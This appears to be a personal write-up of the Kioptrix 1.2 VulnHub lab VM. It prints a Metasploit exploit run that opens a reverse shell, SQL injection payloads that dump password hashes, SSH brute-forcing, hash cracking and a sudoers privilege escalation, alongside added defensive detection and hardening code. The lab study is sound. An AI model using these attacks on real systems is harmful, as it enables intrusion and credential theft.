VulnHub Kioptrix 1.2 notes
Kioptrix 1.2
When setting the VM up, is it better not to create a virtual disk and instead attach the supplied disk to the IDE controller afterwards?
pentest
I always find the target IP with arp-scan. I have never tried it, but is netdiscover the better choice on HTB and the like?
Service enumeration
```
# nmap -p- 10.0.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-27 11:23 EDT
Nmap scan report for 10.0.0.2
Host is up (0.00064s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A5:42:DE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.38 seconds

# nmap -p22,80 -A 10.0.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-27 11:24 EDT
Nmap scan report for 10.0.0.2
Host is up (0.00075s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 08:00:27:A5:42:DE (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.75 ms 10.0.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.30 seconds
```
Points of interest
- OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Details
OpenSSH 4.7p1
Nothing usable?
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Before starting on the web enumeration, I followed the "README.txt" that came out when extracting the downloaded file and added "<target_ip> kioptrix3.com" to the hosts file.
```
# echo "10.0.0.2 kioptrix3.com" >> /etc/hosts
# nikto -h http://kioptrix3.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.2
+ Target Hostname:    kioptrix3.com
+ Target Port:        80
+ Start Time:         2020-04-27 12:07:12 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7784 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-04-27 12:07:37 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://kioptrix3.com

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Apr 27 12:21:26 2020
URL_BASE: http://kioptrix3.com/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://kioptrix3.com/ ----
==> DIRECTORY: http://kioptrix3.com/cache/
==> DIRECTORY: http://kioptrix3.com/core/
+ http://kioptrix3.com/data (CODE:403|SIZE:324)
+ http://kioptrix3.com/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://kioptrix3.com/gallery/
+ http://kioptrix3.com/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://kioptrix3.com/modules/
==> DIRECTORY: http://kioptrix3.com/phpmyadmin/
+ http://kioptrix3.com/server-status (CODE:403|SIZE:333)
==> DIRECTORY: http://kioptrix3.com/style/

---- Entering directory: http://kioptrix3.com/cache/ ----
+ http://kioptrix3.com/cache/index.html (CODE:200|SIZE:1819)

---- Entering directory: http://kioptrix3.com/core/ ----
==> DIRECTORY: http://kioptrix3.com/core/controller/
+ http://kioptrix3.com/core/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://kioptrix3.com/core/lib/
==> DIRECTORY: http://kioptrix3.com/core/model/
==> DIRECTORY: http://kioptrix3.com/core/view/

---- Entering directory: http://kioptrix3.com/gallery/ ----
+ http://kioptrix3.com/gallery/index.php (CODE:500|SIZE:5650)
==> DIRECTORY: http://kioptrix3.com/gallery/photos/
==> DIRECTORY: http://kioptrix3.com/gallery/themes/

---- Entering directory: http://kioptrix3.com/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://kioptrix3.com/phpmyadmin/ ----
+ http://kioptrix3.com/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://kioptrix3.com/phpmyadmin/index.php (CODE:200|SIZE:8136)
==> DIRECTORY: http://kioptrix3.com/phpmyadmin/js/
==> DIRECTORY: http://kioptrix3.com/phpmyadmin/lang/
+ http://kioptrix3.com/phpmyadmin/libraries (CODE:403|SIZE:340)
+ http://kioptrix3.com/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
==> DIRECTORY: http://kioptrix3.com/phpmyadmin/scripts/
==> DIRECTORY: http://kioptrix3.com/phpmyadmin/themes/

---- Entering directory: http://kioptrix3.com/style/ ----
+ http://kioptrix3.com/style/admin.php (CODE:200|SIZE:356)
+ http://kioptrix3.com/style/index.php (CODE:200|SIZE:0)

---- Entering directory: http://kioptrix3.com/core/controller/ ----
+ http://kioptrix3.com/core/controller/index.php (CODE:200|SIZE:0)

---- Entering directory: http://kioptrix3.com/core/lib/ ----
+ http://kioptrix3.com/core/lib/index.php (CODE:200|SIZE:0)

---- Entering directory: http://kioptrix3.com/core/model/ ----
+ http://kioptrix3.com/core/model/index.php (CODE:200|SIZE:0)

---- Entering directory: http://kioptrix3.com/core/view/ ----
+ http://kioptrix3.com/core/view/index.php (CODE:200|SIZE:0)

---- Entering directory: http://kioptrix3.com/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://kioptrix3.com/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://kioptrix3.com/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://kioptrix3.com/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://kioptrix3.com/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://kioptrix3.com/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Apr 27 12:21:42 2020
DOWNLOADED: 46120 - FOUND: 17
```
phpmyadmin?
On the phpMyAdmin login page, whatever you enter seems to log you in?
Hmm, no idea.
I also found the LotusCMS login form.
There is no version information, so there is no certainty that an exploit would work.
If possible, I would rather not use Metasploit.
Using Metasploit against LotusCMS
```
msf5 > search lotuscms

Matching Modules
================

   #  Name                              Disclosure Date  Rank       Check  Description
   -  ----                              ---------------  ----       -----  -----------
   0  exploit/multi/http/lcms_php_exec  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution

msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0

msf5 exploit(multi/http/lcms_php_exec) > set rhosts 10.0.0.2
rhosts => 10.0.0.2
msf5 exploit(multi/http/lcms_php_exec) > set uri /index.php?system=Admin
uri => /index.php?system=Admin
msf5 exploit(multi/http/lcms_php_exec) > run

[*] Started reverse TCP handler on 10.10.10.3:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38288 bytes) to 10.0.0.2
[*] Meterpreter session 1 opened (10.10.10.3:4444 -> 10.0.0.2:45759) at 2020-04-27 13:51:14 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
meterpreter > sysinfo
Computer    : Kioptrix3
OS          : Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
Meterpreter : php/linux
```
From here, the SSH password can be identified with a hydra dictionary attack or similar.
```
# hydra -v -l loneferret -P /usr/share/wordlists/rockyou.txt 10.0.0.2 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-27 14:32:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.0.0.2:22/
(snip)
[22][ssh] host: 10.0.0.2   login: loneferret   password: starwars
[STATUS] attack finished for 10.0.0.2 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 13 final worker threads did not complete until end.
```
Identified loneferret's SSH password as "starwars".
Cracking dreg's password took too long, so I gave up on it.
hydra's "-v" option is a matter of taste.
SQL injection approach
Look at the "gallery" reachable from the kioptrix3.com home page.
Each image appears to be assigned a number.
Possibly managed through SQL.
I want to avoid over-automated tools like sqlmap as much as possible.
After searching around, I arrived at the following site.
Hacking website using SQL Injection -step by step guide – Ethical Hacking Tutorials | Learn How to Hack | Hacking Tricks | Penetration Testing Lab
It went like this.
http://kioptrix3.com/gallery/gallery.php?id=4'
Found an SQL error.
http://kioptrix3.com/gallery/gallery.php?id=4 order by 7--
"order by 7" produces an error, so the number of columns is 7-1 = 6.
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,3,4,5,6--
Columns "2,3" turned out to be the ones that can be replaced (their values are reflected on the page).
The odd phpMyAdmin login had already told me this was MySQL, so check the MySQL version.
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,@@version,3,4,5,6--
The version came back as "5.0.51a-3ubuntu5.4". Next, enumerate the tables.
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--
A lot comes back: "dev_accounts,gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallarific_stats,gallarific_users".
Go for "dev_accounts" first.
From here on, table names apparently have to be picked by hand.
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name = CHAR(100,101,118,95,97,99,99,111,117,110,116,115) --
Found the columns "id,username,password".
"CHAR(100,101,118,95,97,99,99,111,117,110,116,115)" is simply "dev_accounts" written as ASCII codes.
Now dump everything that was found.
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,group_concat(id,username,password),4,5,6 from dev_accounts --
"1dreg0d3eccfb887aabd50f243b3f155c0f85,2loneferret5badcaf789d3d1d09794d8f021f40f0e"
Roughly understandable, but hard to read.
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6 from dev_accounts --
Inserted ":" between the fields to make it readable.
"1:dreg:0d3eccfb887aabd50f243b3f155c0f85,2:loneferret:5badcaf789d3d1d09794d8f021f40f0e"
Now crack these hashes.
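From the defender's side, the requests walked through above leave a very recognisable trail in the web server's access log. The following is an added example (not code from the original post) that flags the probe sequence in Apache log lines; the log lines, rule names and the CHAR() decoder are my own construction, built to mirror the gallery.php requests shown above.

```python
# Added example: detect the UNION-based SQL injection probe sequence from this
# write-up in Apache access-log lines. Sample log lines are constructed.
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed sample access log; the injected paths mirror the write-up, the
# first and last lines are ordinary requests for contrast.
SAMPLE_LOG = """\
10.10.10.3 - - [27/Apr/2020:15:01:02 -0400] "GET /gallery/gallery.php?id=4 HTTP/1.1" 200 5650
10.10.10.3 - - [27/Apr/2020:15:01:09 -0400] "GET /gallery/gallery.php?id=4' HTTP/1.1" 200 5702
10.10.10.3 - - [27/Apr/2020:15:01:20 -0400] "GET /gallery/gallery.php?id=4%20order%20by%207-- HTTP/1.1" 200 5702
10.10.10.3 - - [27/Apr/2020:15:02:41 -0400] "GET /gallery/gallery.php?id=-4%20union%20select%201,2,group_concat(column_name),4,5,6%20from%20information_schema.columns%20where%20table_name%20=%20CHAR(100,101,118,95,97,99,99,111,117,110,116,115)%20-- HTTP/1.1" 200 5800
10.10.10.3 - - [27/Apr/2020:15:03:05 -0400] "GET /index.php?page=index HTTP/1.1" 200 1819
"""

REQ_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

# Each rule is (name, regex applied to a URL-decoded query parameter value).
RULES = [
    ("quote_in_numeric_id",  re.compile(r"^\s*-?\d+\s*'")),
    ("order_by_probe",       re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select",         re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enumeration",   re.compile(r"\binformation_schema\.", re.I)),
    ("char_encoded_literal", re.compile(r"\bCHAR\s*\((\s*\d+\s*,?)+\)", re.I)),
]
CHAR_RE = re.compile(r"\bCHAR\s*\(([\d,\s]+)\)", re.I)

def decode_char_literals(value):
    """Turn MySQL CHAR(100,101,...) back into the string it spells (e.g. dev_accounts)."""
    return [bytes(int(n) for n in m.group(1).split(",")).decode("ascii", "replace")
            for m in CHAR_RE.finditer(value)]

def analyze_line(line):
    """Return (raw_path, sorted rule hits, decoded CHAR() strings); hits is [] when clean."""
    m = REQ_RE.search(line)
    if not m:
        return None, [], []
    path = m.group("path")
    parts = urlsplit(unquote_plus(path))          # decode %20 etc. before matching
    hits, literals = [], []
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for v in values:
            hits += [name for name, rx in RULES if rx.search(v)]
            literals += decode_char_literals(v)
    return path, sorted(set(hits)), literals

def scan(log_text):
    """Map each suspicious request path to (rule hits, decoded CHAR() literals)."""
    findings = {}
    for line in log_text.splitlines():
        path, hits, literals = analyze_line(line)
        if hits:
            findings[path] = (hits, literals)
    return findings

if __name__ == "__main__":
    for path, (hits, lits) in scan(SAMPLE_LOG).items():
        print(path, hits, lits)
```

The decoded CHAR() literal is what turns an alert into a triage note: it shows which table the request was enumerating.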
```
# printf "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d09794d8f021f40f0e" > hashes
# john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
starwars         (?)
Mast3r           (?)
2g 0:00:00:02 DONE (2020-04-27 23:43) 0.9569g/s 5183Kp/s 5183Kc/s 5184KC/s Maswahu06..Mash2189
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

# hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...
(snip)
5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes
Time.Started.....: Mon Apr 27 23:49:51 2020 (9 secs)
Time.Estimated...: Mon Apr 27 23:50:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1328.9 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10835968/14344384 (75.54%)
Rejected.........: 0/10835968 (0.00%)
Restore.Point....: 10833920/14344384 (75.53%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: MasterFate -> MarkBruce1

Started: Mon Apr 27 23:49:20 2020
Stopped: Mon Apr 27 23:50:00 2020
```
I tried both John the Ripper and hashcat; if you just want to run something without thinking, john looks simpler. On a PC with a GPU, where you can run the cracking on the host, a properly configured hashcat may be the better choice.
Get a shell and root
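Both tools finished in seconds because the dev_accounts passwords are stored as unsalted MD5: every candidate from the wordlist is hashed once and compared against every target. The added example below (not code from the original post) reproduces that lookup with the two hashes from the write-up against a constructed mini wordlist, then shows the storage form that defeats it, a per-user salt with an iterated PBKDF2 from the standard library; the record format and function names are my own.

```python
# Added example: unsalted MD5 lookup (what john/hashcat did above) beside a
# salted, iterated hash. Wordlist is constructed; hashes are from the write-up.
import hashlib
import hmac
import os

# The two dev_accounts hashes recovered above.
DEV_ACCOUNTS = {
    "dreg":       "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}
# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "123456", "starwars", "letmein", "Mast3r", "goat"]

def crack_raw_md5(hashes, wordlist):
    """Mimic john --format=raw-md5: one MD5 per candidate, matched against all targets."""
    targets = {h.lower(): user for user, h in hashes.items()}
    found = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        if digest in targets:
            found[targets[digest]] = word
    return found

# Hardened storage: random 16-byte salt per record plus PBKDF2-HMAC-SHA256.
# Record layout (my own convention): algo$iterations$salt_hex$dk_hex
ITERATIONS = 200_000

def make_record(password, salt=None):
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def verify_record(password, record):
    """Recompute with the stored salt/iterations and compare in constant time."""
    _, iters, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

def salted_records_differ(password):
    """Same password for two users gives two different records, so one crack hits one user."""
    return make_record(password) != make_record(password)

if __name__ == "__main__":
    print(crack_raw_md5(DEV_ACCOUNTS, WORDLIST))
    rec = make_record("starwars")
    print(rec)
    print(verify_record("starwars", rec), verify_record("Starwars", rec))
```

With the salted form a wordlist run has to redo the full PBKDF2 work for every user, and identical passwords no longer share a hash.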
```
# rlwrap ssh loneferret@10.0.0.2
loneferret@10.0.0.2's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Tue Apr 28 01:29:56 2020 from 10.10.10.3
loneferret@Kioptrix3:~$ ls
CompanyPolicy.README  checksec.sh
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

[1]+  Stopped                 sudo ht /etc/sudoers
loneferret@Kioptrix3:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
```
rlwrap is recommended, so give it a try.
"CompanyPolicy.README" spells out a very loose security policy.
Checking privileges with "sudo -l" confirms it: just as loose.
"sudo ht" threw an error, so I set TERM to xterm.
In the ht editor, press F3 to open "/etc/sudoers" and add "/bin/sh" to loneferret's entry. Alternatively, add an entry giving dreg access to "/bin/sh".
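The lesson for whoever maintains sudoers is that the "!/usr/bin/su" entry buys nothing once root may run an editor without a password: the editor can rewrite /etc/sudoers itself. The added example below (not code from the original post) parses "sudo -l" output of the shape shown above and flags both problems; the EDITOR_LIKE set, the rule regex and the function names are my own assumptions, and the input text is a constructed copy of the box's output.

```python
# Added example: audit "sudo -l" output for deny-only entries and for editors
# granted as root. Input is a constructed copy of the rules seen on the box.
import re

SUDO_L = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Programs that can open or write arbitrary files, or spawn a shell, as the
# run-as user. Assumed list for illustration, not exhaustive.
EDITOR_LIKE = {"ht", "vi", "vim", "nano", "less", "more", "ed", "emacs"}

# "(runas) TAG: TAG: command ..." as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_sudo_l(text):
    """Return one dict per rule line: runas, nopasswd flag, negation flag, command path."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue                      # header / blank lines
        cmd = m.group("cmd")
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in m.group("tags"),
            "negated": cmd.startswith("!"),
            "cmd": cmd.lstrip("!").split()[0],
        })
    return rules

def audit(rules):
    """List the policy problems a reviewer should raise for these rules."""
    findings = []
    for r in rules:
        base = r["cmd"].rsplit("/", 1)[-1]
        if r["negated"]:
            # A "!" entry only blocks that exact path; it grants nothing and
            # does not stop any other command from reaching the same result.
            findings.append(f"deny rule for {r['cmd']} is not a security boundary")
        elif r["runas"] == "root" and base in EDITOR_LIKE:
            note = " (no password required)" if r["nopasswd"] else ""
            findings.append(f"{r['cmd']} as root can rewrite /etc/sudoers or spawn a shell{note}")
    return findings

if __name__ == "__main__":
    for f in audit(parse_sudo_l(SUDO_L)):
        print("FINDING:", f)
```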
```
# cd /root
# ls
Congrats.txt  ht-2.0.18
# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal) fun in the
process.

I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com

Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: http://www.lotuscms.org
Gallery application: Gallarific 2.1 - Free Version released October 10, 2009
                     http://www.gallarific.com
Vulnerable version of this application can be downloaded from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/

Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
```
root's home directory held a congratulations message.
The end
Understanding what is going on is more fun than running automated tools.